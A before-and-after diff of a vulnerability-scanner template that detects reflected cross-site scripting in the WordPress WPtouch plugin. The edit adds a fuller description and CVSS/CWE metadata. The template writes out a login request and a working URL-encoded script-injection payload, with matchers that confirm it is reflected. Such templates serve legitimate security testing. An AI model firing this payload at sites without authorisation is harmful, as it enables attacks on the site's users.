vulnerabilities/wordpress/wptouch-xss.yaml (before)
id: wptouch-xss

info:
  name: WPtouch < 4.3.44 - Cross Site Scripting
  author: akincibor
  severity: medium
  description: |
    The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4
    - https://wordpress.org/plugins/wptouch/advanced/
  tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wptouch-admin-license&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: body
        words:
          - 'WPtouchCustom'
          - 'WPtouchAjax'
          - 'toplevel_page_wptouch-admin'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/wordpress/wptouch-xss.yaml (after)
id: wptouch-xss

info:
  name: WordPress WPtouch <4.3.44 - Cross-Site Scripting
  author: akincibor
  severity: medium
  description: |
    WordPress WPtouch plugin prior to 4.3.44 contains a cross-site scripting vulnerability. The plugin does not escape some URLs before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4
    - https://wordpress.org/plugins/wptouch/advanced/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wptouch-admin-license&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: body
        words:
          - 'WPtouchCustom'
          - 'WPtouchAjax'
          - 'toplevel_page_wptouch-admin'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/12/13

vulnerabilities/wordpress/wptouch-xss.yaml (diff)
@@ -1,14 +1,18 @@
 id: wptouch-xss
 
 info:
-  name: WPtouch < 4.3.44 - Cross Site Scripting
+  name: WordPress WPtouch <4.3.44 - Cross-Site Scripting
   author: akincibor
   severity: medium
   description: |
-    The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+    WordPress WPtouch plugin prior to 4.3.44 contains a cross-site scripting vulnerability. The plugin does not escape some URLs before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4
     - https://wordpress.org/plugins/wptouch/advanced/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cwe-id: CWE-80
   tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan
 
 requests:
@@ -48,3 +52,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/12/13
